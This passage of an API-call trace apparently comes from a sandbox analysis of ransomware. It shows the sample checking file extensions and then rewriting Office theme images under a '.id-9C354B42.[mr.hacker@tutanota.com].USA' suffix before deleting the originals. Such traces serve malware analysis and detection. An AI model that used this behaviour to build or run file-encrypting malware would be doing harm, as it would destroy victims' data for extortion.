Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\THMBNAIL.PNG") returned 75 [0044.848] lstrlenW (lpString=".zip") returned 4 [0044.848] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0044.848] lstrlenW (lpString=".rar") returned 4 [0044.848] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0044.848] lstrlenW (lpString=".bz2") returned 4 [0044.848] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0044.848] lstrlenW (lpString=".7z") returned 3 [0044.848] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0044.848] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\THMBNAIL.PNG") returned 75 [0044.848] lstrlenW (lpString=".dbf") returned 4 [0044.848] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0044.848] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\THMBNAIL.PNG") returned 75 [0044.848] lstrlenW (lpString=".1cd") returned 4 [0044.848] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0044.848] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\THMBNAIL.PNG") returned 75 [0044.848] lstrlenW (lpString=".jpg") returned 4 [0044.848] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0044.848] lstrcmpiW (lpString1=".GIF", lpString2=".USA") returned -1 [0044.848] lstrlenW (lpString="PREVIEW.GIF") returned 11 [0044.848] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\bluecalm\\preview.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x210 [0044.849] GetFileSizeEx (in: hFile=0x210, lpFileSize=0x2aaff1c | out: lpFileSize=0x2aaff1c*=1560) returned 1 [0044.849] CloseHandle (hObject=0x210) returned 1 [0044.849] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\bluecalm\\preview.gif")) returned 0x20 [0044.849] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\PREVIEW.GIF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\bluecalm\\preview.gif.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0044.849] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\bluecalm\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x210 [0044.849] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0044.849] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0044.849] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\PREVIEW.GIF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\bluecalm\\preview.gif.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x208 [0044.851] GetLastError () returned 0x0 [0044.851] ReadFile (in: hFile=0x210, lpBuffer=0x3070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aafed4, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2aafed4*=0x618, lpOverlapped=0x0) returned 1 [0044.852] WriteFile (in: hFile=0x208, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x620, lpNumberOfBytesWritten=0x2aafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2aafc9c*=0x620, lpOverlapped=0x0) returned 1 [0044.853] ReadFile (in: hFile=0x210, lpBuffer=0x3070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aafed4, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2aafed4*=0x0, lpOverlapped=0x0) returned 1 [0044.853] WriteFile (in: hFile=0x208, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x2aafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2aafc9c*=0xea, lpOverlapped=0x0) returned 1 [0044.853] SetEndOfFile (hFile=0x208) returned 1 [0044.853] CloseHandle (hObject=0x208) returned 1 [0044.854] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0044.854] SetEndOfFile (hFile=0x210) returned 1 [0044.855] CloseHandle (hObject=0x210) returned 1 [0044.855] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\PREVIEW.GIF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0044.855] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\bluecalm\\preview.gif")) returned 1 [0044.855] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\PREVIEW.GIF") returned 76 [0044.855] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\PREVIEW.GIF") returned 76 [0044.855] lstrlenW (lpString=".doc") returned 4 [0044.855] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0044.855] lstrlenW (lpString=".docx") returned 5 [0044.855] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0044.855] lstrlenW (lpString=".pdf") returned 4 [0044.855] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0044.855] lstrlenW (lpString=".xls") returned 4 [0044.855] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0044.855] lstrlenW (lpString=".xlsx") returned 5 [0044.855] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0044.855] lstrlenW (lpString=".ppt") returned 4 [0044.855] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0044.855] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\PREVIEW.GIF") returned 76 [0044.855] lstrlenW (lpString=".zip") returned 4 [0044.855] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0044.855] lstrlenW (lpString=".rar") returned 4 [0044.856] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0044.856] lstrlenW (lpString=".bz2") returned 4 [0044.856] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0044.856] lstrlenW (lpString=".7z") returned 3 [0044.856] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0044.856] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\PREVIEW.GIF") returned 76 [0044.856] lstrlenW (lpString=".dbf") returned 4 [0044.856] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0044.856] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\PREVIEW.GIF") returned 76 [0044.856] lstrlenW (lpString=".1cd") returned 4 [0044.856] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0044.856] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\PREVIEW.GIF") returned 76 [0044.856] lstrlenW (lpString=".jpg") returned 4 [0044.856] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0044.856] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\PREVIEW.GIF") returned 76 [0044.856] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\PREVIEW.GIF") returned 76 [0044.856] lstrlenW (lpString=".doc") returned 4 [0044.856] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0044.856] lstrlenW (lpString=".docx") returned 5 [0044.856] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0044.856] lstrlenW (lpString=".pdf") returned 4 [0044.856] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0044.856] lstrlenW (lpString=".xls") returned 4 [0044.856] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0044.856] lstrlenW (lpString=".xlsx") returned 5 [0044.856] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0044.856] lstrlenW (lpString=".ppt") returned 4 [0044.856] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0044.856] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\PREVIEW.GIF") returned 76 [0044.856] lstrlenW (lpString=".zip") returned 4 [0044.856] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0044.856] lstrlenW (lpString=".rar") returned 4 [0044.856] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0044.856] lstrlenW (lpString=".bz2") returned 4 [0044.856] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0044.856] lstrlenW (lpString=".7z") returned 3 [0044.857] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0044.857] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\PREVIEW.GIF") returned 76 [0044.857] lstrlenW (lpString=".dbf") returned 4 [0044.857] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0044.857] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\PREVIEW.GIF") returned 76 [0044.857] lstrlenW (lpString=".1cd") returned 4 [0044.857] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0044.857] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\PREVIEW.GIF") returned 76 [0044.857] lstrlenW (lpString=".jpg") returned 4 [0044.857] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0044.857] lstrcmpiW (lpString1=".PNG", lpString2=".USA") returned -1 [0044.857] lstrlenW (lpString="THMBNAIL.PNG") returned 12 [0044.857] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\bluecalm\\thmbnail.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x210 [0044.857] GetFileSizeEx (in: hFile=0x210, lpFileSize=0x2aaff1c | out: lpFileSize=0x2aaff1c*=33009) returned 1 [0044.857] CloseHandle (hObject=0x210) returned 1 [0044.857] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\bluecalm\\thmbnail.png")) returned 0x20 [0044.857] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\THMBNAIL.PNG.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\bluecalm\\thmbnail.png.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0044.858] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\bluecalm\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x210 [0044.858] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0044.858] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0044.858] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\THMBNAIL.PNG.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\bluecalm\\thmbnail.png.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x208 [0044.858] GetLastError () returned 0x0 [0044.858] ReadFile (in: hFile=0x210, lpBuffer=0x3070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aafed4, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2aafed4*=0x80f1, lpOverlapped=0x0) returned 1 [0044.860] WriteFile (in: hFile=0x208, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x8100, lpNumberOfBytesWritten=0x2aafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2aafc9c*=0x8100, lpOverlapped=0x0) returned 1 [0044.861] ReadFile (in: hFile=0x210, lpBuffer=0x3070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aafed4, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2aafed4*=0x0, lpOverlapped=0x0) returned 1 [0044.861] WriteFile (in: hFile=0x208, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2aafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2aafc9c*=0xec, lpOverlapped=0x0) returned 1 [0044.861] SetEndOfFile (hFile=0x208) returned 1 [0044.861] CloseHandle (hObject=0x208) returned 1 [0044.862] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0044.862] SetEndOfFile (hFile=0x210) returned 1 [0044.863] CloseHandle (hObject=0x210) returned 1 [0044.863] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\THMBNAIL.PNG.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0044.863] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\bluecalm\\thmbnail.png")) returned 1 [0044.864] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\THMBNAIL.PNG") returned 77 [0044.864] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\THMBNAIL.PNG") returned 77 [0044.864] lstrlenW (lpString=".doc") returned 4 [0044.864] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0044.864] lstrlenW (lpString=".docx") returned 5 [0044.864] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0044.864] lstrlenW (lpString=".pdf") returned 4 [0044.864] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0044.864] lstrlenW (lpString=".xls") returned 4 [0044.864] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0044.864] lstrlenW (lpString=".xlsx") returned 5 [0044.864] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0044.864] lstrlenW (lpString=".ppt") returned 4 [0044.864] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0044.864] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\THMBNAIL.PNG") returned 77 [0044.864] lstrlenW (lpString=".zip") returned 4 [0044.864] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0044.864] lstrlenW (lpString=".rar") returned 4 [0044.864] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0044.864] lstrlenW (lpString=".bz2") returned 4 [0044.864] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0044.864] lstrlenW (lpString=".7z") returned 3 [0044.864] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0044.864] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\THMBNAIL.PNG") returned 77 [0044.864] lstrlenW (lpString=".dbf") returned 4 [0044.864] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0044.864] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\THMBNAIL.PNG") returned 77 [0044.864] lstrlenW (lpString=".1cd") returned 4 [0044.864] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0044.864] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\THMBNAIL.PNG") returned 77 [0044.864] lstrlenW (lpString=".jpg") returned 4 [0044.864] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0044.865] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\THMBNAIL.PNG") returned 77 [0044.865] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\THMBNAIL.PNG") returned 77 [0044.865] lstrlenW (lpString=".doc") returned 4 [0044.865] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0044.865] lstrlenW (lpString=".docx") returned 5 [0044.865] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0044.865] lstrlenW (lpString=".pdf") returned 4 [0044.865] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0044.865] lstrlenW (lpString=".xls") returned 4 [0044.865] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0044.865] lstrlenW (lpString=".xlsx") returned 5 [0044.865] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0044.865] lstrlenW (lpString=".ppt") returned 4 [0044.865] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0044.865] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\THMBNAIL.PNG") returned 77 [0044.865] lstrlenW (lpString=".zip") returned 4 [0044.865] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0044.865] lstrlenW (lpString=".rar") returned 4 [0044.865] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0044.865] lstrlenW (lpString=".bz2") returned 4 [0044.865] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0044.865] lstrlenW (lpString=".7z") returned 3 [0044.865] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0044.865] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\THMBNAIL.PNG") returned 77 [0044.865] lstrlenW (lpString=".dbf") returned 4 [0044.865] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0044.865] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\THMBNAIL.PNG") returned 77 [0044.865] lstrlenW (lpString=".1cd") returned 4 [0044.865] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0044.865] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\THMBNAIL.PNG") returned 77 [0044.865] lstrlenW (lpString=".jpg") returned 4 [0044.865] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0044.866] lstrcmpiW (lpString1=".GIF", lpString2=".USA") returned -1 [0044.866] lstrlenW (lpString="PREVIEW.GIF") returned 11 [0044.866] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\blueprnt\\preview.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x210 [0044.866] GetFileSizeEx (in: hFile=0x210, lpFileSize=0x2aaff1c | out: lpFileSize=0x2aaff1c*=1925) returned 1 [0044.866] CloseHandle (hObject=0x210) returned 1 [0044.869] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\blueprnt\\preview.gif")) returned 0x20 [0044.869] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\PREVIEW.GIF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\blueprnt\\preview.gif.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0044.869] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\blueprnt\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x210 [0044.869] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0044.869] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0044.869] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\PREVIEW.GIF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\blueprnt\\preview.gif.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x208 [0044.871] GetLastError () returned 0x0 [0044.872] ReadFile (in: hFile=0x210, lpBuffer=0x3070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aafed4, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2aafed4*=0x785, lpOverlapped=0x0) returned 1 [0044.873] WriteFile (in: hFile=0x208, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x790, lpNumberOfBytesWritten=0x2aafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2aafc9c*=0x790, lpOverlapped=0x0) returned 1 [0044.874] ReadFile (in: hFile=0x210, lpBuffer=0x3070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aafed4, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2aafed4*=0x0, lpOverlapped=0x0) returned 1 [0044.874] WriteFile (in: hFile=0x208, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x2aafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2aafc9c*=0xea, lpOverlapped=0x0) returned 1 [0044.874] SetEndOfFile (hFile=0x208) returned 1 [0044.874] CloseHandle (hObject=0x208) returned 1 [0044.875] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0044.875] SetEndOfFile (hFile=0x210) returned 1 [0044.876] CloseHandle (hObject=0x210) returned 1 [0044.876] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\PREVIEW.GIF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0044.876] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\blueprnt\\preview.gif")) returned 1 [0044.876] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\PREVIEW.GIF") returned 76 [0044.876] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\PREVIEW.GIF") returned 76 [0044.876] lstrlenW (lpString=".doc") returned 4 [0044.876] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0044.876] lstrlenW (lpString=".docx") returned 5 [0044.876] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0044.876] lstrlenW (lpString=".pdf") returned 4 [0044.876] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0044.876] lstrlenW (lpString=".xls") returned 4 [0044.876] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0044.876] lstrlenW (lpString=".xlsx") returned 5 [0044.876] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0044.876] lstrlenW (lpString=".ppt") returned 4 [0044.876] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0044.876] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\PREVIEW.GIF") returned 76 [0044.876] lstrlenW (lpString=".zip") returned 4 [0044.876] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0044.877] lstrlenW (lpString=".rar") returned 4 [0044.877] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0044.877] lstrlenW (lpString=".bz2") returned 4 [0044.877] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0044.877] lstrlenW (lpString=".7z") returned 3 [0044.877] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0044.877] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\PREVIEW.GIF") returned 76 [0044.877] lstrlenW (lpString=".dbf") returned 4 [0044.877] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0044.877] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\PREVIEW.GIF") returned 76 [0044.877] lstrlenW (lpString=".1cd") returned 4 [0044.877] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0044.877] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\PREVIEW.GIF") returned 76 [0044.877] lstrlenW (lpString=".jpg") returned 4 [0044.877] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0044.877] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\PREVIEW.GIF") returned 76 [0044.877] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\PREVIEW.GIF") returned 76 [0044.877] lstrlenW (lpString=".doc") returned 4 [0044.877] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0044.877] lstrlenW (lpString=".docx") returned 5 [0044.877] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0044.877] lstrlenW (lpString=".pdf") returned 4 [0044.877] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0044.877] lstrlenW (lpString=".xls") returned 4 [0044.877] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0044.877] lstrlenW (lpString=".xlsx") returned 5 [0044.877] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0044.877] lstrlenW 